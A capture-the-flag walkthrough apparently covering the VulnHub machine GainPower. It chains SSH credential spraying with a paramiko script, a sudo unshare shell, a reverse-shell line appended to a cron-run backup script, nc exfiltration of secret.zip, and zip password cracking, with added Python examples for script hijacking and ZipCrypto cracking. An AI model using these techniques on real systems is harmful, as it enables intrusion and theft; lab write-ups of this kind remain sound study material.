[VLN] GainPower

Today we are going to hack the VulnHub machine called GainPower. You can download it from the following link: https://www.vulnhub.com/entry/gainpower-1,493/
  • Enumeration
  • We start with an nmap scan of every port to see what is open.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.34
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-30 11:53 CEST
    Nmap scan report for 192.168.1.34
    Host is up (0.0016s latency).
    Not shown: 65532 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
    | ssh-hostkey:
    |   2048 88:41:61:11:e1:1f:18:7d:d6:0c:38:29:25:79:16:2c (RSA)
    |   256 18:c5:fd:ce:cd:2b:92:f8:d9:17:17:21:24:9d:67:df (ECDSA)
    |_  256 84:c5:14:e4:e9:33:21:41:6a:92:72:b9:a7:33:1a:ea (ED25519)
    80/tcp   open  http    Apache httpd 2.4.6 ((CentOS))
    | http-methods:
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.6 (CentOS)
    |_http-title: Watch shop | eCommers
    8000/tcp open  http    Ajenti http control panel
    |_http-title: Ajenti
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 18.79 seconds
    Besides SSH and the web shop on port 80 there is an Ajenti control panel on port 8000; it will matter later. First we connect over SSH (with any username, holi here) to see whether the service tells us anything before authenticating. It does, through its banner.
    sml@Cassandra:~/tools$ ssh holi@192.168.1.34
    Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)
      ___      _        ___
     / __|__ _(_)_ _   | _ \_____ __ _____ _ _
    | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
     \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|
    I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
    I already told the format of password of everyone in the yesterday's metting.
    Now i have configured everything.
    My request is to everyone to Complete assignments on time
    btw one of my employee have sudo powers because he is my favourite
    NOTE : "This message will automatically removed after 2 days"
    - BOSS
    holi@192.168.1.34's password:
    The banner tells us that the usernames follow the pattern employee1, employee2, and so on, that the password format was announced in a meeting, and that one of the users has sudo rights. With that in mind, and after a little trial and error, it turns out the password is the username itself: employee1/employee1, employee2/employee2, etc. We log in as employee1 for a first look.
  • Low Shell
  • sml@Cassandra:~$ ssh employee1@192.168.1.34
    [same banner as above]
    employee1@192.168.1.34's password:
    Last login: Tue Jun 30 18:01:37 2020 from cassandra.home
    [employee1@localhost ~]$
    We know that one employee has sudo privileges, so let's see how many employees there are.
    [employee1@localhost home]$ cat /etc/passwd | grep employ
    ---SNIP---
    employee16:x:1015:1015::/home/employee16:/bin/bash
    employee51:x:1050:1050::/home/employee51:/bin/bash
    employee52:x:1051:1051::/home/employee52:/bin/bash
    employee97:x:1096:1096::/home/employee97:/bin/bash
    employee98:x:1097:1097::/home/employee98:/bin/bash
    employee99:x:1098:1098::/home/employee99:/bin/bash
    employee100:x:1099:1099::/home/employee100:/bin/bash
    ---SNIP---
    There are 100 of them... Rather than log in by hand, we write a Python script that connects as each employeeX (password = username), runs sudo -l, and prints whatever sudo answers, so we can see who has a rule and who just gets an error. The script is the following:
    #!/usr/bin/env python3
    # Sweep employee1..employee100 over SSH, using the username as the password,
    # and run "sudo -l" as each one so we can spot who has a sudo rule.
    import paramiko

    HOST = "192.168.1.34"  # MODIFY IP

    def check_sudo(user):
        print(user)
        password = user  # password format: the username itself
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            ssh.connect(HOST, username=user, password=password)
        except paramiko.AuthenticationException:
            print("host: %s: login failed for %s" % (HOST, user))
            return
        session = ssh.get_transport().open_session()
        session.set_combine_stderr(True)
        session.get_pty()  # sudo needs a tty to ask for the password
        session.exec_command("sudo -l")
        stdin = session.makefile("wb", -1)
        stdout = session.makefile("rb", -1)
        stdin.write((password + "\n").encode())  # answer sudo's password prompt
        stdin.flush()
        for line in stdout.read().splitlines():
            print("host: %s: %s" % (HOST, line.decode(errors="replace")))
        ssh.close()

    for x in range(1, 101):
        check_sudo("employee" + str(x))
    We run the script...
    sml@Cassandra:~$ python g.py
    ---SNIP---
    host: 192.168.1.34: employee63
    host: 192.168.1.34: [sudo] password for employee63:
    host: 192.168.1.34: Sorry, user employee63 may not run sudo on localhost.
    employee64
    host: 192.168.1.34: employee64
    host: 192.168.1.34: [sudo] password for employee64:
    host: 192.168.1.34: Matching Defaults entries for employee64 on localhost:
    host: 192.168.1.34:     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    host: 192.168.1.34:     env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    host: 192.168.1.34:     env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    host: 192.168.1.34:     env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    host: 192.168.1.34:     env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    host: 192.168.1.34:     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    host: 192.168.1.34:     secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
    host: 192.168.1.34:
    host: 192.168.1.34: User employee64 may run the following commands on localhost:
    host: 192.168.1.34:     (programmer) /usr/bin/unshare
    employee65
    host: 192.168.1.34: employee65
    host: 192.168.1.34: [sudo] password for employee65:
    host: 192.168.1.34: Sorry, user employee65 may not run sudo on localhost.
    ---SNIP---
    The user employee64 can use sudo! We log in with employee64/employee64.
    sml@Cassandra:~/tools$ ssh employee64@192.168.1.34
    [same banner as above]
    employee64@192.168.1.34's password:
    Last failed login: Tue Jun 30 08:05:27 EDT 2020 from cassandra.home on ssh:notty
    There were 677 failed login attempts since the last successful login.
    Last login: Mon May 18 08:59:41 2020
    [employee64@localhost ~]$
    Once logged in, we run sudo -l to see what we are allowed to do.
    [employee64@localhost ~]$ sudo -l
    Matching Defaults entries for employee64 on localhost:
        !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
        env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
        env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
        env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
        env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
        env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
        secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

    User employee64 may run the following commands on localhost:
        (programmer) /usr/bin/unshare
    We can run unshare as the user programmer. unshare just executes whatever program it is given inside new namespaces, and that program inherits the uid sudo switched to, so passing it /bin/bash gives us a shell as programmer.
    [employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
    bash-4.2$ id
    uid=1182(programmer) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    Now that we are programmer, we look around the system a bit more.
    bash-4.2$ groups
    prome
    bash-4.2$ find / -group prome 2>/dev/null
    /proc/20325/timers
    /proc/20325/patch_state
    /tmp/back.txt
    /home/vanshal
    /media/programmer
    /media/programmer/scripts
    /media/programmer/scripts/backup.sh
    We belong to the group prome, and the script /media/programmer/scripts/backup.sh is owned by that group (find -group only shows ownership; check with ls -l that the group write bit is set before relying on it, as it is here). Running pspy64 shows a scheduled task executing that script as the user vanshal (UID 1183):
    2020/06/30 08:55:01 CMD: UID=1183 PID=20604 | /bin/bash /media/programmer/scripts/backup.sh
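The check that pspy output calls for, as an added example that is not part of the original write-up: parse pspy's "CMD:" lines, work out which file each command really executes (the script, not the interpreter), and report the ones run by a different UID whose group or world write bit would let us rewrite them, which is exactly the backup.sh situation. The pspy lines are constructed, and demo() builds the matching script tree in a temporary directory so the permission checks run offline; on the box you would feed find_hijackable() pspy's real output instead.

```python
import os
import re
import stat
import tempfile

# Constructed pspy-style lines.  {base} is replaced by a temporary directory that
# demo() populates, so the permission check runs against real files offline.
SAMPLE_PSPY = """\
2020/06/30 08:55:01 CMD: UID=1183 PID=20604 | /bin/bash {base}/scripts/backup.sh
2020/06/30 08:55:01 CMD: UID=0    PID=20605 | /usr/sbin/crond -n
2020/06/30 08:56:01 CMD: UID=1183 PID=20610 | /usr/bin/python3 -u {base}/scripts/report.py --daily
2020/06/30 08:56:02 CMD: UID=1182 PID=20611 | {base}/scripts/own.sh
"""

PSPY_RE = re.compile(r"CMD: UID=(\d+)\s+PID=(\d+)\s+\|\s+(.*)$")
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl", "ruby"}


def parse_pspy(text):
    """Yield (uid, pid, argv) for every CMD: line in pspy's output."""
    for line in text.splitlines():
        m = PSPY_RE.search(line)
        if m:
            yield int(m.group(1)), int(m.group(2)), m.group(3).split()


def executed_file(argv):
    """The file whose contents actually run: the script when argv[0] is an
    interpreter (skipping interpreter options such as -u), else the binary."""
    if not argv:
        return None
    if os.path.basename(argv[0]) in INTERPRETERS:
        for arg in argv[1:]:
            if not arg.startswith("-"):
                return arg
        return None                      # only options were given, no script path
    return argv[0]


def writable_by_group_or_world(path):
    """True when the group or world write bit is set: the mode the prome group abused."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_hijackable(pspy_text, my_uid=None):
    """(uid, path) for files another UID executes that we could rewrite.  The mode-bit
    test ignores who we are on purpose, so the result is the same when run as root."""
    my_uid = os.getuid() if my_uid is None else my_uid
    hits, seen = [], set()
    for uid, _pid, argv in parse_pspy(pspy_text):
        target = executed_file(argv)
        if uid == my_uid or target is None or target in seen:
            continue
        seen.add(target)
        if os.path.isabs(target) and os.path.isfile(target) and writable_by_group_or_world(target):
            hits.append((uid, target))
    return hits


def demo():
    """Create the sample tree (backup.sh group-writable, report.py not) and run the check."""
    base = tempfile.mkdtemp()
    os.mkdir(os.path.join(base, "scripts"))
    for name, mode in (("backup.sh", 0o664), ("report.py", 0o644), ("own.sh", 0o664)):
        path = os.path.join(base, "scripts", name)
        with open(path, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(path, mode)
    hits = find_hijackable(SAMPLE_PSPY.format(base=base), my_uid=1182)
    return [(uid, os.path.relpath(path, base)) for uid, path in hits]


if __name__ == "__main__":
    for uid, path in demo():
        print("UID %d runs %s, which is group/world writable" % (uid, path))
```

own.sh is skipped because the same UID runs it (nothing to gain), report.py because it is 0644, and crond because it is not writable by anyone but root; only backup.sh, run as UID 1183 and group-writable, is reported.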
    The machine has no nc, so we download one from our machine into its /tmp.
    bash-4.2$ wget http://192.168.1.148/nc
    --2020-06-30 08:57:03--  http://192.168.1.148/nc
    Connecting to 192.168.1.148:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 35520 (35K) [application/octet-stream]
    Saving to: 'nc'

    100%[======================================>] 35,520      --.-K/s   in 0s

    2020-06-30 08:57:03 (574 MB/s) - 'nc' saved [35520/35520]

    bash-4.2$ chmod +x nc
    We modify the script so that it gives us a reverse shell the next time the task runs.
    bash-4.2$ vi /media/programmer/scripts/backup.sh
    # append this line at the end of the script:
    /tmp/nc -e /bin/bash 192.168.1.148 5555
    We start an nc listener on our machine.
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    And after waiting for the scheduled task to fire...
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.34] 33524
    id
    uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    python -c 'import pty; pty.spawn("/bin/bash")'
    [vanshal@localhost ~]$
  • local.txt
  • [vanshal@localhost ~]$ ls
    local.txt  secret.zip
    [vanshal@localhost ~]$ cat local.txt
    You successfully owned the user of this box :-)
    Best of Luck for the root flag: 5c2a29d7b95868da9e503502f301e8dd
    Twitter : VanshalG
    There is also a file called secret.zip. We use nc to transfer it to our machine so we can crack it. On our machine we run:
    sml@Cassandra:~$ nc -lp 1234 > secret.zip
    On the victim:
    [vanshal@localhost ~]$ /tmp/nc -w 3 192.168.1.148 1234 < secret.zip
    Once we have the .zip, we crack its password with a dictionary attack. -D -p selects dictionary mode with rockyou.txt as the wordlist, and -u makes fcrackzip verify each candidate by actually unzipping with it, which weeds out the false positives that the zip format's one-byte password check lets through.
    sml@Cassandra:~$ fcrackzip -v -u -D -p rockyou.txt secret.zip
    found file 'Mypasswords.txt', (size cp/uc    243/   257, flags 9, chk 7f46)


    PASSWORD FOUND!!!!: pw == 81237900
    We extract the file...
    sml@Cassandra:~$ unzip secret.zip
    Archive:  secret.zip
    [secret.zip] Mypasswords.txt password:
      inflating: Mypasswords.txt
    We look at the contents: a single 256-character line.
    sml@Cassandra:~$ cat Mypasswords.txt
    aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB
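What fcrackzip is doing above, as an added example that is neither the write-up's code nor fcrackzip's: traditional PKWARE "ZipCrypto" encryption (the scheme a password-protected zip made with legacy tools uses) is reimplemented here only in the encrypt direction, to construct a sample archive offline, and the dictionary attack then leans on Python's standard zipfile module for the decrypt side. The point it shows is the two-stage check a cracker relies on: a 1-byte check byte in the encrypted header rejects roughly 255 of every 256 wrong passwords without touching the payload, and the CRC-32 of the decrypted data catches the rest (the equivalent of fcrackzip's -u). The archive contents and toy wordlist are constructed; the file name and the password 81237900 are taken from the page. The real secret.zip is deflated rather than stored, which changes nothing in crack_zip().

```python
import io
import struct
import zipfile
import zlib


# --- Traditional PKWARE "ZipCrypto" stream cipher, mirroring CPython's zipfile decrypter ---
def _gen_crc(crc):
    for _ in range(8):
        crc = (crc >> 1) ^ 0xEDB88320 if crc & 1 else crc >> 1
    return crc

_CRCTAB = [_gen_crc(i) for i in range(256)]


class ZipCryptoKeys:
    """The three 32-bit key registers, initialised from the password bytes."""
    def __init__(self, pwd):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in pwd:
            self.update(b)

    def update(self, b):                  # fed with every PLAINTEXT byte
        self.k0 = (self.k0 >> 8) ^ _CRCTAB[(self.k0 ^ b) & 0xFF]
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = (self.k2 >> 8) ^ _CRCTAB[(self.k2 ^ (self.k1 >> 24)) & 0xFF]

    def stream_byte(self):
        t = self.k2 | 2
        return ((t * (t ^ 1)) >> 8) & 0xFF


def zipcrypto_encrypt(pwd, plaintext, check_byte):
    """12-byte header (11 filler bytes + the check byte) then the data, all encrypted."""
    keys = ZipCryptoKeys(pwd)
    out = bytearray()
    for p in bytes(11) + bytes([check_byte]) + plaintext:
        out.append(p ^ keys.stream_byte())
        keys.update(p)
    return bytes(out)


def build_encrypted_zip(name, data, pwd):
    """Hand-rolled one-entry archive: stored (no compression), flag bit 0 = encrypted.
    The check byte is the top byte of the CRC-32, which is what lets a reader (or a
    cracker) reject most wrong passwords without decrypting the payload."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    enc = zipcrypto_encrypt(pwd, data, (crc >> 24) & 0xFF)
    fname = name.encode()
    flags, method, dtime, ddate = 0x0001, 0, 0, 0x0021          # 1980-01-01 00:00
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, dtime, ddate,
                        crc, len(enc), len(data), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method, dtime,
                          ddate, crc, len(enc), len(data), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local) + len(enc), 0)
    return local + enc + central + eocd


def crack_zip(blob, wordlist):
    """Dictionary attack.  zipfile raises RuntimeError when the check byte mismatches and
    BadZipFile (bad CRC) on the ~1/256 wrong passwords that pass the check byte, so both
    are treated as 'next candidate'.  Returns (password, plaintext) or (None, None)."""
    zf = zipfile.ZipFile(io.BytesIO(blob))
    name = zf.namelist()[0]
    for cand in wordlist:
        pwd = cand.encode() if isinstance(cand, str) else cand
        try:
            return pwd, zf.read(name, pwd=pwd)
        except (RuntimeError, zipfile.BadZipFile, zlib.error):
            continue
    return None, None


# Constructed sample: the box's file name, made-up contents, the password fcrackzip
# recovered above, and a toy wordlist standing in for rockyou.txt.
SAMPLE_ZIP = build_encrypted_zip("Mypasswords.txt", b"placeholder, not the real file\n", b"81237900")
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "81237900", "letmein"]


def demo():
    return crack_zip(SAMPLE_ZIP, SAMPLE_WORDLIST)


if __name__ == "__main__":
    pwd, data = demo()
    print("PASSWORD FOUND: pw ==", pwd.decode(), "->", data.decode().strip())
```

Against the real archive: crack_zip(open("secret.zip", "rb").read(), (l.rstrip("\n") for l in open("rockyou.txt", errors="ignore"))). It is far slower than fcrackzip because every candidate goes through pure-Python key scheduling, but it makes the check-byte/CRC logic explicit; note also that ZipCrypto is breakable with a known-plaintext attack regardless of password strength, so a strong password in a legacy zip is no real protection.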
  • Privilege Escalation
  • The string looks like it could be a hash... but it is not :) We go to http://192.168.1.34:8000, the Ajenti panel nmap found, and log in with root as the username and the contents of Mypasswords.txt as the password. Yes... that was the password :) In the left-hand menu we open "Terminal", type "/bin/bash" in the box at the top right and click "Run"; a web terminal opens as root, since it inherits the privileges of the Ajenti service itself.
  • root.txt
  • [root@localhost root]# ls
    proof.txt
    [root@localhost root]# cat proof.txt
    You successfully owned the root of this box :-)
    Flag: eb2e174c3883ff6b5fd871167795b4d6
    Twitter : VanshalG
  • End
  • And with that we are root on the machine :)